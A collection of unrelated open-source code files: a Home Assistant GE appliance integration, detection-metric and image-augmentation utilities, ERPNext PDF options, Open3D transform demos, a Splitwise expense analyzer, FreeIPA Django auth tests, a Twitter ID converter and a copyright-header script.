self._brew_cups_entity,
GeErdSensor(self, ErdCode.CCM_CURRENT_WATER_TEMPERATURE),
GeErdBinarySensor(self, ErdCode.CCM_OUT_OF_WATER, device_class_override="problem"),
GeCcmPotNotPresentBinarySensor(self, ErdCode.CCM_POT_PRESENT, device_class_override="problem")
]
entities = base_entities + ccm_entities
return entities
async def start_brewing(self) -> None:
"""Aggregate brew settings and start brewing."""
new_mode = ErdCcmBrewSettings(self._brew_cups_entity.value,
self._brew_strengh_entity.brew_strength,
self._brew_temperature_entity.brew_temperature)
await self.appliance.async_set_erd_value(ErdCode.CCM_BREW_SETTINGS, new_mode)
```
#### File: ge_home/devices/water_softener.py
```python
import logging
from typing import List
from homeassistant.helpers.entity import Entity
from gehomesdk import ErdCode, ErdApplianceType
from .base import ApplianceApi
from ..entities import (
GeErdSensor,
GeErdPropertySensor,
GeErdBinarySensor,
GeErdShutoffPositionSelect,
)
_LOGGER = logging.getLogger(__name__)
class WaterSoftenerApi(ApplianceApi):
"""API class for water softener objects"""
APPLIANCE_TYPE = ErdApplianceType.WATER_SOFTENER
def get_all_entities(self) -> List[Entity]:
base_entities = super().get_all_entities()
ws_entities = [
GeErdBinarySensor(self, ErdCode.WH_FILTER_MANUAL_MODE, icon_on_override="mdi:human", icon_off_override="mdi:robot"),
GeErdPropertySensor(self, ErdCode.WH_FILTER_FLOW_RATE, "flow_rate"),
GeErdBinarySensor(self, ErdCode.WH_FILTER_FLOW_ALERT, device_class_override="moisture"),
GeErdSensor(self, ErdCode.WH_FILTER_DAY_USAGE),
GeErdSensor(self, ErdCode.WH_SOFTENER_ERROR_CODE, icon_override="mdi:alert-circle"),
GeErdBinarySensor(self, ErdCode.WH_SOFTENER_LOW_SALT, icon_on_override="mdi:alert", icon_off_override="mdi:grain"),
GeErdSensor(self, ErdCode.WH_SOFTENER_SHUTOFF_VALVE_STATE, icon_override="mdi:state-machine"),
GeErdSensor(self, ErdCode.WH_SOFTENER_SALT_LIFE_REMAINING, icon_override="mdi:calendar-clock"),
GeErdShutoffPositionSelect(self, ErdCode.WH_SOFTENER_SHUTOFF_VALVE_CONTROL),
]
entities = base_entities + ws_entities
return entities
```
#### File: entities/ccm/ge_ccm_brew_strength.py
```python
import logging
from typing import List, Any, Optional
from gehomesdk import ErdCode, ErdCcmBrewStrength
from ...devices import ApplianceApi
from ..common import GeErdSelect, OptionsConverter
from .ge_ccm_cached_value import GeCcmCachedValue
_LOGGER = logging.getLogger(__name__)
class GeCcmBrewStrengthOptionsConverter(OptionsConverter):
def __init__(self):
self._default = ErdCcmBrewStrength.MEDIUM
@property
def options(self) -> List[str]:
return [i.stringify() for i in [ErdCcmBrewStrength.LIGHT, ErdCcmBrewStrength.MEDIUM, ErdCcmBrewStrength.BOLD, ErdCcmBrewStrength.GOLD]]
def from_option_string(self, value: str) -> Any:
try:
return ErdCcmBrewStrength[value.upper()]
except:
_LOGGER.warn(f"Could not set brew strength to {value.upper()}")
return self._default
def to_option_string(self, value: ErdCcmBrewStrength) -> Optional[str]:
try:
return value.stringify()
except:
return self._default.stringify()
class GeCcmBrewStrengthSelect(GeErdSelect, GeCcmCachedValue):
def __init__(self, api: ApplianceApi):
GeErdSelect.__init__(self, api = api, erd_code = ErdCode.CCM_BREW_STRENGTH, converter = GeCcmBrewStrengthOptionsConverter())
GeCcmCachedValue.__init__(self)
@property
def brew_strength(self) -> ErdCcmBrewStrength:
return self._converter.from_option_string(self.current_option)
async def async_select_option(self, value):
GeCcmCachedValue.set_value(self, value)
self.schedule_update_ha_state()
@property
def current_option(self):
return self.get_value(device_value = super().current_option)
```
#### File: entities/common/ge_erd_number.py
```python
import logging
from typing import Optional
from gehomesdk.erd.erd_data_type import ErdDataType
from homeassistant.components.number import NumberEntity
from homeassistant.const import (
DEVICE_CLASS_TEMPERATURE,
TEMP_FAHRENHEIT,
)
from gehomesdk import ErdCodeType, ErdCodeClass
from .ge_erd_entity import GeErdEntity
from ...devices import ApplianceApi
_LOGGER = logging.getLogger(__name__)
class GeErdNumber(GeErdEntity, NumberEntity):
"""GE Entity for numbers"""
def __init__(
self,
api: ApplianceApi,
erd_code: ErdCodeType,
erd_override: str = None,
icon_override: str = None,
device_class_override: str = None,
uom_override: str = None,
data_type_override: ErdDataType = None,
min_value: float = 1,
max_value: float = 100,
step_value: float = 1,
mode: str = "auto"
):
super().__init__(api, erd_code, erd_override, icon_override, device_class_override)
self._uom_override = uom_override
self._data_type_override = data_type_override
self._min_value = min_value
self._max_value = max_value
self._step_value = step_value
self._mode = mode
@property
def value(self):
try:
value = self.appliance.get_erd_value(self.erd_code)
return self._convert_value_from_device(value)
except KeyError:
return None
@property
def unit_of_measurement(self) -> Optional[str]:
return self._get_uom()
@property
def _data_type(self) -> ErdDataType:
if self._data_type_override is not None:
return self._data_type_override
return self.appliance.get_erd_code_data_type(self.erd_code)
@property
def min_value(self) -> float:
return self._convert_value_from_device(self._min_value)
@property
def max_value(self) -> float:
return self._convert_value_from_device(self._max_value)
@property
def step(self) -> float:
return self._step_value
@property
def mode(self) -> float:
return self._mode
def _convert_value_from_device(self, value):
"""Convert to expected data type"""
if self._data_type == ErdDataType.INT:
return int(round(value))
else:
return value
def _get_uom(self):
"""Select appropriate units"""
#if we have an override, just use it
if self._uom_override:
return self._uom_override
if self.device_class == DEVICE_CLASS_TEMPERATURE:
#NOTE: it appears that the API only sets temperature in Fahrenheit,
#so we'll hard code this UOM instead of using the device configured
#settings
return TEMP_FAHRENHEIT
return None
def _get_device_class(self) -> Optional[str]:
if self._device_class_override:
return self._device_class_override
if self.erd_code_class in [
ErdCodeClass.RAW_TEMPERATURE,
ErdCodeClass.NON_ZERO_TEMPERATURE,
]:
return DEVICE_CLASS_TEMPERATURE
return None
def _get_icon(self):
if self.erd_code_class == ErdCodeClass.DOOR:
if self.state.lower().endswith("open"):
return "mdi:door-open"
if self.state.lower().endswith("closed"):
return "mdi:door-closed"
return super()._get_icon()
async def async_set_value(self, value):
"""Sets the ERD value, assumes that the data type is correct"""
if self._data_type == ErdDataType.INT:
value = int(round(value))
try:
await self.appliance.async_set_erd_value(self.erd_code, value)
except:
_LOGGER.warning(f"Could not set {self.name} to {value}")
``` |
{
"source": "87ZGitHub/sfd.pytorch",
"score": 2
} |
#### File: 87ZGitHub/sfd.pytorch/evaluation_metrics.py
```python
import numpy as np
from anchor import compute_iou
import torch
def AP(prediction, gt, iou_threshold):
"""compute average precision of detection, all the coordinate should be
(top left bottom right)
Args:
predict_bboxes (ndarray): should be a N * (4 + 1 + 1) ndarray
N is number of boxes been predicted(batch_size),
4 represents [top, left, bottom, right],
1 is the confidence of the class
1 is the number represents the class
gt_bboxes (ndarray): should be a M * (4 + 1) ndarray
M is the number of ground truth bboxes of that image
4 represents [top, left, bottom, right],
1 represents the class number of the bbox. Since we use 0 to be the
background, so class number of object should be started from 1
iou_threshold (float): threshold of iou for seperate the true positive
or false positive
num_classes (int): how many classes of the target
Returns: vector of class_number size, each element is AP
value of every class
"""
# apply softmax for prediction[:, 4:], get the highest index and klass
bboxes = prediction[:, :4]
scores = prediction[:, 4]
klasses = prediction[:, 5]
# sort klass, scores, bboxes by value of scores
inds = np.argsort(scores)[::-1]
scores, klasses, bboxes = scores[inds], klasses[inds], bboxes[inds]
# get a list result of tp and fp, length should be the same as bboxes
result = np.zeros(len(bboxes))
matched_index = []
ious = compute_iou(bboxes, gt[:, :4])
for index, iou in enumerate(ious):
gt_index = np.argmax(iou)
if iou[gt_index] > iou_threshold \
and gt_index not in matched_index \
and klasses[index] == gt[gt_index, 4]:
result[index] = 1
matched_index.append(gt_index)
# get tp and fp result of every class
ap_of_klass = {}
for klass in np.unique(klasses):
klass_indices = klasses == klass
klass_result = result[klass_indices]
object_num = np.sum(gt[:, 4] == klass)
cumsum = np.cumsum(klass_result)
recall_point_num = np.unique(cumsum)
precisions = np.zeros_like(recall_point_num, dtype=np.float)
recalls = np.zeros_like(recall_point_num, dtype=np.float)
for recall_point in recall_point_num:
recall_point = int(recall_point)
if recall_point == 0:
continue
predictions_num = np.searchsorted(cumsum, recall_point) + 1.0
precisions[recall_point - 1] = float(recall_point) / predictions_num
recalls[recall_point - 1] = recall_point / object_num
recalls = np.insert(recalls, 0, 0.0)
precisions = np.insert(precisions, 0, 0.0)
recalls = np.append(recalls, 1.0)
precisions = np.append(precisions, 0.0)
# make precision monotone decreased
current_precision = 0
for i in range(len(precisions) - 1, -1, -1):
precisions[i] = max(current_precision, precisions[i])
current_precision = precisions[i]
ap = 0
for i in range(1, len(precisions)):
precision = precisions[i]
recall_span = recalls[i] - recalls[i - 1]
ap += precision * recall_span
ap_of_klass[klass] = ap
return ap_of_klass
def softmax(mat):
"""change a vector to softmax score in batch
Args:
mat (ndarray): 2 dimensional matrix, shape is [batch_size, array_size]
Returns:
ndarray: a tensor which is has the same shape as the input
"""
mat_exp = torch.exp(mat)
mat_sum = torch.sum(mat_exp, dim=1, keepdim=True)
return mat_exp / mat_sum
```
#### File: 87ZGitHub/sfd.pytorch/imageaug.py
```python
import numpy as np
from random import random
def crop_square(image, coordinates, ratio=1, keep_area_threshold=0.5):
"""random crop a image into a square image and change the
original coordinates to new coordinates. Some coordinates will be last
if it is at outside of the cropped area.
Args:
image (ndarray): numpy image, should be [height, width, channel]
coordinates (tuple): a tuple of coordinates list, should be
([top, left, bottom, right], ...)
ratio (int, optional): defaults to 1. cropped ratio, relative to the
shorter edge of the image
keep_area_threshold (float, optional): defaults to 0.5. how much area
in the cropped size of a ground truth bounding box to decide whther
to keep it.
Returns:
tuple: (cropped_image, new_coordinates), noticed that new_coordinates
may be an empty list.
"""
size = image.shape[:2]
short_size = np.min(size)
square_size = int(short_size * ratio)
n_top = int((image.shape[0] - square_size) * random())
n_left = int((image.shape[1] - square_size) * random())
n_bottom = n_top + square_size
n_right = n_left + square_size
cropped_image = image[n_top:n_bottom, n_left:n_right]
new_coordinates = []
for coordinate in coordinates:
width = coordinate[3] - coordinate[1]
height = coordinate[2] - coordinate[0]
n_width = max(min(coordinate[3], n_right) - max(coordinate[1], n_left), 0)
n_height = max(min(coordinate[2], n_bottom) - max(coordinate[0], n_top), 0)
# there are some all zero coordinates in wider face
if (width * height) == 0:
continue
area_in_crop = (n_width * n_height) / (width * height)
if area_in_crop < keep_area_threshold:
continue
new_coordinates.append([
max(coordinate[0] - n_top, 0),
max(coordinate[1] - n_left, 0),
max(coordinate[2] - n_top, 0),
max(coordinate[3] - n_left, 0),
*coordinate[4:]
])
return cropped_image, new_coordinates
def random_horizontal_flip(image, coordinates):
"""randomly horizontal flip a image and its coodinates
Args:
image (ndarray): numpy image, should be [height, width, channel]
coordinates (tuple): a tuple of coordinates list, should be
([top, left, bottom, right], ...)
Returns:
tuple: (image, new_coordinates), noticed that new_coordinates
may be an empty list.
"""
if random() > 0.5:
return image, coordinates
image = image[:, ::-1, :]
new_coordinates = []
for coordinate in coordinates:
new_coordinates.append([
coordinate[0],
image.shape[1] - coordinate[1],
coordinate[2],
image.shape[1] - coordinate[3],
*coordinate[4:]
])
return image, new_coordinates
``` |
{
"source": "8848digital/erpnext-print-formats",
"score": 2
} |
#### File: erpnext-print-formats/erpnext_print_formats/pdf.py
```python
import frappe
from frappe.utils.pdf import read_options_from_html,get_cookie_options
def prepare_options(html, options):
if not options:
options = {}
options.update({
'print-media-type': None,
'background': None,
'images': None,
'quiet': None,
# 'no-outline': None,
'encoding': "UTF-8",
#'load-error-handling': 'ignore'
})
if not options.get("margin-right"):
options['margin-right'] = '1mm'
if not options.get("margin-left"):
options['margin-left'] = '1mm'
html, html_options = read_options_from_html(html)
options.update(html_options or {})
# cookies
options.update(get_cookie_options())
# page size
if not options.get("page-size"):
options['page-size'] = frappe.db.get_single_value("Print Settings", "pdf_page_size") or "A4"
return html, options
``` |
{
"source": "888dahong888/open3dTest",
"score": 3
} |
#### File: 888dahong888/open3dTest/test02.py
```python
import open3d as o3d
import numpy as np
#平移操作
def test_translate(mesh,copy):
mesh=o3d.geometry.TriangleMesh.create_coordinate_frame()
mesh_tx=copy.deepcopy(mesh).translate((1.3,0.0))
mesh_ty=copy.deepcopy(mesh).translate((0.0,1.3))
print("center of mesh: ",mesh.get_center())
print(f'Center of mesh tx: {mesh_tx.get_center()}')
print(f'Center of mesh ty: {mesh_ty.get_center()}')
o3d.visualization.draw_geometries([mesh, mesh_tx, mesh_ty])
mesh_mv = copy.deepcopy(mesh).translate((2,2,2), relative=False) #移动中心点
print(f'Center of mesh: {mesh.get_center()}')
print(f'Center of translated mesh: {mesh_mv.get_center()}')
o3d.visualization.draw_geometries([mesh, mesh_mv])
#旋转操作
def test_rotate(mesh,copy):
mesh = o3d.geometry.TriangleMesh.create_coordinate_frame()
mesh_r = copy.deepcopy(mesh)
R = mesh.get_rotation_matrix_from_xyz((np.pi/2,0,np.pi/4))
mesh_r.rotate(R, center=(0,0,0))
o3d.visualization.draw_geometries([mesh, mesh_r])
mesh = o3d.geometry.TriangleMesh.create_coordinate_frame()
mesh_r = copy.deepcopy(mesh).translate((2,0,0))
mesh_r.rotate(mesh.get_rotation_matrix_from_xyz((np.pi/2,0,np.pi/4)), center=(0,0,0))
o3d.visualization.draw_geometries([mesh, mesh_r])
#缩放操作
def test_scale(mesh,copy):
mesh = o3d.geometry.TriangleMesh.create_coordinate_frame()
mesh_s = copy.deepcopy(mesh).translate((2,0,0))
mesh_s.scale(0.5, center=mesh_s.get_center())
o3d.visualization.draw_geometries([mesh, mesh_s])
mesh = o3d.geometry.TriangleMesh.create_coordinate_frame()
mesh_s = copy.deepcopy(mesh).translate((2,1,0))
mesh_s.scale(0.5, center=(0,0,0))
o3d.visualization.draw_geometries([mesh, mesh_s])
#通用装换操作
def test_transform(mesh,copy):
mesh = o3d.geometry.TriangleMesh.create_coordinate_frame()
T = np.eye(4)
T[:3,:3] = mesh.get_rotation_matrix_from_xyz((0,np.pi/3, np.pi/2))
T[0,3] = 1
T[1,3] = 1.3
print(T)
mesh_t = copy.deepcopy(mesh).transform(T)
o3d.visualization.draw_geometries([mesh, mesh_t])
``` |
{
"source": "88Chemin/splitwise-analyzer",
"score": 3
} |
#### File: splitwise-analyzer/wallstreet/__init__.py
```python
def get_index_for_dude(dude):
"""
:param dude: splitwise user object
:return: index in row/column in payment matrix for the incoming dude
"""
if dude.first_name == "Alex":
return 0
elif dude.first_name == "Daniel":
return 1
elif dude.first_name == "Patrick":
return 2
elif dude.first_name == "maany":
return 3
def payment_matrix(expenses):
"""
Generate a raw payment matrix
<NAME> maany patrick
___________________________
alex |
danny |
maany |
patrick |
:param expenses: group expenses from splitwise api
:return:
"""
matrix = [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]]
for expense in expenses:
paid_by = [ x for x in expense.users if float(x.net_balance) > 0]
owed_by = [ x for x in expense.users if float(x.net_balance) < 0]
if len(paid_by) > 1:
raise RuntimeError("Complex payment. Multiple people paid. Cannot process in the patrix right now")
if int(paid_by[0].id) in [int(user.id) for user in owed_by]:
print("Same person paid and owes?")
print("Expense: {expense}".format(expense=str(expense.description).encode('utf-8')))
print("Paid By: {paid_by}".format(paid_by=paid_by[0].first_name))
print("Amount: {amount}".format(amount=paid_by[0].net_balance))
print("Dudes who owe: {dude_who_owe}".format(dude_who_owe=[user.first_name for user in owed_by]))
for dude_who_owes in owed_by:
x = get_index_for_dude(paid_by[0])
y = get_index_for_dude(dude_who_owes)
amount = -1 * float(dude_who_owes.net_balance)
print("{dude} need to pay {amount}. Updating X: {x}, Y: {y}".format(dude=dude_who_owes.first_name,
amount =dude_who_owes.net_balance,
x = x,
y = y))
matrix[x][y] = amount
return matrix
def simplify_matrix(matrix):
"""
If A owes B and B owes A back, then only a single transaction can settle both up.
:param matrix: payment matrix
:return: simplified payment matrix
"""
i_j_pairs = [[i, j] for i in range(4) for j in range(4) if i < j]
for i_j_pair in i_j_pairs:
i = i_j_pair[0]
j = i_j_pair[1]
if matrix[i][j] > matrix[j][i]:
matrix[i][j] -= matrix[j][i]
matrix[j][i] = 0
else:
matrix[j][i] -= matrix[i][j]
matrix[i][j] = 0
return matrix
def print_matrix(matrix):
"""
Prints the 4x4 matrix
:param matrix:
:return:
"""
for row in matrix:
print("{e0}\t\t{e1}\t\t{e2}\t\t{e3}\n".format(e0=int(row[0]), e1=int(row[1]), e2=int(row[2]), e3=int(row[3])))
print("--------------------------------------------------------------------------------")
def triangle_simplifier(simplified_matrix):
"""
Implement Splitwise like polygon simplification on the matrix to reduce number of transactions needed to settle up.
:param simplified_matrix:
:return:
"""
pass
def alex_maany_analyzer(group, expenses):
alex = [x for x in group.members if x.first_name == "Alex"][0]
maany = [x for x in group.members if x.first_name == "maany"][0]
alex_maany_expenses = []
for expense in expenses:
user_id_array = [user.id for user in expense.users]
if alex.id in user_id_array and maany.id in user_id_array:
alex_maany_expenses.append(expense)
# some metrics
maany_net = sum([float(y.net_balance) for x in alex_maany_expenses for y in x.users if y.id == maany.id])
alex_net = sum([float(y.net_balance) for x in alex_maany_expenses for y in x.users if y.id == alex.id])
non_sfr = [x for x in alex_maany_expenses if x.description != 'SFR']
maany_to_pay = 0
maany_negative_transactions = []
maany_positive_transactions = []
wtf_transactions = []
# detailed shit
for expense in alex_maany_expenses:
###
# paid by alex and amount owed by maany = x
# paid my maany and amount owed by alex = y
###
alex_expense_user = [user for user in expense.users if user.id == alex.id][0]
maany_expense_user = [user for user in expense.users if user.id == maany.id][0]
if float(alex_expense_user.net_balance) > 0 and float(maany_expense_user.net_balance) < 0:
maany_to_pay = maany_to_pay + float(maany_expense_user.net_balance)
maany_negative_transactions.append(expense)
elif float(alex_expense_user.net_balance) < 0 and float(maany_expense_user.net_balance) > 0:
maany_to_pay = maany_to_pay - float(alex_expense_user.net_balance)
maany_positive_transactions.append(expense)
else:
wtf_transactions.append(expense)
print("WTF WTF WTF WTF")
``` |
{
"source": "88Ocelot/django-freeipa-auth",
"score": 2
} |
#### File: django-freeipa-auth/freeipa_auth/tests.py
```python
from django.test import Client
from django .conf import settings
from django.contrib.auth.models import User
import pytest
class TestFreeIpaBackendAuth(object):
client = Client()
username = "dummy_freeipa_username"
password = "<PASSWORD>"
def test_login(self, settings, patch_authenticate_success):
"""Test succesful login"""
logged_in = self.client.login(username=self.username, password=self.password)
assert logged_in
user = User.objects.get(username=self.username)
# No permissions on basic login
assert not user.is_staff
assert not user.is_superuser
def test_logout(self, patch_authenticate_success):
"""Test successful logout"""
logged_in = self.client.login(username=self.username, password=<PASSWORD>)
assert logged_in
logged_in = self.client.logout()
assert not logged_in
def test_update_user_groups(self, test_group, settings,
patch_authenticate_success, patch_remote_user_groups):
"""Test that user groups are update on first time login"""
settings.override(FREEIPA_AUTH_UPDATE_USER_GROUPS=True)
logged_in = self.client.login(username=self.username, password=<PASSWORD>)
assert logged_in
user = User.objects.get(username=self.username)
# Since the "is_staff" flag exists in the settings
# the user will be a staff member
assert user.is_staff
# No mapping was provided for the superuser
# flag so user will not be a superuser
assert not user.is_superuser
# The user is part of "test_group" on the freeipa server so they
# will update in django as well
assert test_group in user.groups.all()
def test_update_user_groups_with_prefix(self, test_group, monkeypatch, settings,
patch_authenticate_success, patch_remote_user_groups):
"""Test that user groups are mapped with a required group prefix"""
settings.override(FREEIPA_AUTH_UPDATE_USER_GROUPS=True)
# Patch user groups on freeipa to have the required prefix for mapping
monkeypatch.setattr("freeipa_auth.freeipa_utils.FreeIpaSession.groups",
["foo.django.group.admin",
"foo.django.group.test_group"])
logged_in = self.client.login(username=self.username, password=self.password)
assert logged_in
# Assert that the user in the mapped django
# groups and has the mapped permission
user = User.objects.get(username=self.username)
assert user.is_staff
assert test_group in user.groups.all()
def test_update_user_attrs(self, monkeypatch, settings,
patch_authenticate_success, patch_remote_user_groups):
"""Test that user attrs are updated on first time login"""
# Mock user data from freeipa
monkeypatch.setattr("freeipa_auth.freeipa_utils.FreeIpaSession._get_user_data",
lambda *args: {"givenname": ['Chester'], 'sn': ['Tester'], 'mail': ['<EMAIL>']})
logged_in = self.client.login(username=self.username, password=self.password)
assert logged_in
# Assert that user attrs are mapped and saved
user = User.objects.get(username=self.username)
assert user.first_name == "Chester"
assert user.last_name == "Tester"
assert user.email == '<EMAIL>'
def test_always_update_user(self, settings, monkeypatch,
patch_authenticate_success, patch_remote_user_groups):
"""Test that user is always updated on subsequent logins if set to True in settings"""
logged_in = self.client.login(username=self.username, password=self.password)
assert logged_in
user = User.objects.get(username=self.username)
# Assert that initially user is not a superuser
assert not user.is_superuser
logged_in = self.client.logout()
assert not logged_in
# Patch user groups on freeipa to have the superuser flag
monkeypatch.setattr("freeipa_auth.freeipa_utils.FreeIpaSession.groups",
["admin", "test_group", "superuser", "test_permission"])
# Login again
logged_in = self.client.login(username=self.username, password=<PASSWORD>)
assert logged_in
# User should now be superuser since
# FREEIPA_AUTH_ALWAYS_UPDATE_USER is set to True in settings
user = User.objects.get(username=self.username)
assert not user.is_superuser
assert user.is_staff
def test_no_update_user(self, settings, monkeypatch,
patch_authenticate_success, patch_remote_user_groups):
"""Test that user is not updated on subsequent logins if set to False in settings"""
settings.override(FREEIPA_AUTH_ALWAYS_UPDATE_USER=False,
FREEIPA_AUTH_USER_FLAGS_BY_GROUP={"is_staff": ["admin"],
'is_superuser': ['superuser']})
# Mock user data from freeipa
monkeypatch.setattr("freeipa_auth.freeipa_utils.FreeIpaSession._get_user_data",
lambda *args: {"givenname": ['Chester'], 'sn': ['Tester'], 'mail': ['<EMAIL>']})
logged_in = self.client.login(username=self.username, password=<PASSWORD>)
assert logged_in
user = User.objects.get(username=self.username)
# Assert that initially user does not have last name
assert not user.last_name
logged_in = self.client.logout()
assert not logged_in
# Patch user groups on freeipa to have the superuser flag
monkeypatch.setattr("freeipa_auth.freeipa_utils.FreeIpaSession.groups",
["admin", "test_group"])
# Login again
logged_in = self.client.login(username=self.username, password=self.password)
assert logged_in
# User should still not be superuser since FREEIPA_AUTH_ALWAYS_UPDATE_USER is set to False
user = User.objects.get(username=self.username)
assert not user.last_name
def test_invalid_credentials(self, patch_authenticate_fail):
"""Test that no django user is created when login credentials are invalid"""
logged_in = self.client.login(username=self.username, password=self.password)
assert not logged_in
# User should not be in the database
with pytest.raises(User.DoesNotExist):
User.objects.get(username=self.username)
def test_classic_django_auth(self, test_user):
"""Test that classic django auth is still the main authentication backend"""
# Here we can see we do not need to patch the freeipa response
# since it does not reach the freeipa backend auth when a
# user uses the django app login credentials
logged_in = self.client.login(username=test_user.username, password=<PASSWORD>.unhashed_password)
assert logged_in
@pytest.mark.skip(reason="Don't want to automate remote server calls")
def test_login_live(self, settings, liveserver_username, liveserver_password, liveserver):
"""Test succesful login on live server"""
settings.override(FREEIPA_AUTH_SERVER=liveserver,
FREEIPA_AUTH_SSL_VERIFY=False)
logged_in = self.client.login(username=liveserver_username, password=liveserver_password)
assert logged_in
assert User.objects.get(username=liveserver_username)
@pytest.mark.skip(reason="Don't want to automate remote server calls")
def test_login_live_failover(self, settings, liveserver_username, liveserver_password, liveserver):
"""
Test authentication falls back to failover
server if there is a connection error on main server
"""
settings.override(FREEIPA_AUTH_SERVER="test.fake-site.com",
FREEIPA_AUTH_FAILOVER_SERVER=liveserver,
FREEIPA_AUTH_SSL_VERIFY=False)
logged_in = self.client.login(username=liveserver_username, password=liveserver_password)
# Client will authenticate on failover
# server and be logged in on the django app
assert logged_in
assert User.objects.get(username=liveserver_username)
``` |
{
"source": "88RZ/discord-twitter-bot",
"score": 3
} |
#### File: bot/utils/twitter_id_converter.py
```python
from tweepy import API, Cursor
from tweepy.error import TweepError
import re
class Converter:
def __init__(self, config, auth):
self.config = config
self.client = API(auth)
def convert(self) -> dict:
for instance in self.config["Discord"]:
tmp_twitter_ids = []
if "twitter_lists" in instance.keys() and not instance["twitter_lists"] in [
None,
"",
[],
[""],
]:
for twitter_list in instance["twitter_lists"]:
tmp_twitter_ids += self.twitter_list_to_id(twitter_list)
if "twitter_handles" in instance.keys() and not instance["twitter_handles"] in [
None,
"",
[],
[""],
]:
tmp_twitter_ids += self.twitter_handle_to_id(instance["twitter_handles"])
if "twitter_ids" not in instance:
instance["twitter_ids"] = list()
instance["twitter_ids"].extend(
x for x in tmp_twitter_ids if x not in instance["twitter_ids"]
)
if "" in instance["twitter_ids"]:
instance["twitter_ids"].remove("")
if tmp_twitter_ids:
print(
"{amount} twitter ids have been added through twitter list.".format(
amount=len(tmp_twitter_ids)
)
)
# throw out config that don't have a webhook url
self.config["Discord"] = [
{k: v for k, v in instance.items() if instance.get("webhook_urls", [])}
for instance in self.config["Discord"]
]
# throw out config that have empty twitter_ids, track and location
self.config["Discord"] = [
{
k: v
for k, v in instance.items()
if instance.get("twitter_ids", [])
or instance.get("track", [])
or instance.get("location", [])
}
for instance in self.config["Discord"]
]
# throw out empty config
while {} in self.config["Discord"]:
self.config["Discord"].remove({})
return self.config
def twitter_list_to_id(self, twitter_list_url: str) -> list:
twitter_ids = []
pattern = "(https?:\/\/(?:www\.)?)?twitter\.com\/(i\/lists\/(?P<list_id>[a-zA-Z0-9-]+)|(?P<owner_screen_name>[a-zA-Z0-9]+)\/lists\/(?P<slug>[a-zA-Z0-9-]+))"
for m in re.finditer(pattern, twitter_list_url, re.I):
try:
for member in Cursor(
self.client.list_members,
list_id=m.group("list_id"),
owner_screen_name=m.group("owner_screen_name"),
slug=m.group("slug"),
).items():
twitter_id = member._json["id_str"]
if twitter_id not in twitter_ids:
twitter_ids.append(twitter_id)
except TweepError as e:
print(e)
return twitter_ids
def twitter_handle_to_id(self, twitter_handles: list) -> list:
full_users = []
user_count = len(twitter_handles)
for i in range(0, int((user_count // 100)) + 1):
try:
full_users.extend(
self.client.lookup_users(
screen_names=twitter_handles[i * 100 : min((i + 1) * 100, user_count)]
)
)
except TweepError as e:
print(e)
return [user.id_str for user in full_users]
if __name__ == "__main__":
import sys
sys.path.append("..")
from config import config, auth
c = Converter(config, auth)
print(c.convert())
``` |
{
"source": "88Sasha88/Chombo_3.2",
"score": 2
} |
#### File: util/migration/copyright.py
```python
import sys
import string
g_boilerplate = []
g_boilerplate.append(
"""\
// CHOMBO Copyright (c) 2000-2004, The Regents of the University of
// California, through Lawrence Berkeley National Laboratory (subject to
// receipt of any required approvals from U.S. Dept. of Energy). All
// rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// (1) Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// (2) Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
// (3) Neither the name of Lawrence Berkeley National Laboratory, U.S.
// Dept. of Energy nor the names of its contributors may be used to endorse
// or promote products derived from this software without specific prior
// written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
// TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
// PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
// OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
// EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
// PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
// PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
// LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
// NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
// SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
// You are under no obligation whatsoever to provide any bug fixes,
// patches, or upgrades to the features, functionality or performance of
// the source code ("Enhancements") to anyone; however, if you choose to
// make your Enhancements available either publicly, or directly to
// Lawrence Berkeley National Laboratory, without imposing a separate
// written license agreement for such Enhancements, then you hereby grant
// the following license: a non-exclusive, royalty-free perpetual license
// to install, use, modify, prepare derivative works, incorporate into
// other computer software, distribute, and sublicense such Enhancements or
// derivative works thereof, in binary and source code form.
//
// TRADEMARKS. Product and company names mentioned herein may be the
// trademarks of their respective owners. Any rights not expressly granted
// herein are reserved.
//\
""".split('\n'))
g_boilerplate.append( g_boilerplate[-1][:] )
g_boilerplate[-1][0] = string.replace( g_boilerplate[-1][0], '2004', '2006' )
g_boilerplate.append(
"""\
// This software is copyright (C) by the Lawrence Berkeley
// National Laboratory. Permission is granted to reproduce
// this software for non-commercial purposes provided that
// this notice is left intact.
//
// It is acknowledged that the U.S. Government has rights to
// this software under Contract DE-AC03-765F00098 between
// the U.S. Department of Energy and the University of
// California.
//
// This software is provided as a professional and academic
// contribution for joint exchange. Thus it is experimental,
// is provided ``as is'', with no warranties of any kind
// whatsoever, no support, no promise of updates, or printed
// documentation. By using this software, you acknowledge
// that the Lawrence Berkeley National Laboratory and
// Regents of the University of California shall have no
// liability with respect to the infringement of other
// copyrights by any part of this software.
//\
""".split('\n'))
g_boilerplate.append(
"""\
C CHOMBO Copyright (c) 2000-2004, The Regents of the University of
C California, through Lawrence Berkeley National Laboratory (subject to
C receipt of any required approvals from U.S. Dept. of Energy). All
C rights reserved.
C
C Redistribution and use in source and binary forms, with or without
C modification, are permitted provided that the following conditions are met:
C
C (1) Redistributions of source code must retain the above copyright
C notice, this list of conditions and the following disclaimer.
C (2) Redistributions in binary form must reproduce the above copyright
C notice, this list of conditions and the following disclaimer in the
C documentation and/or other materials provided with the distribution.
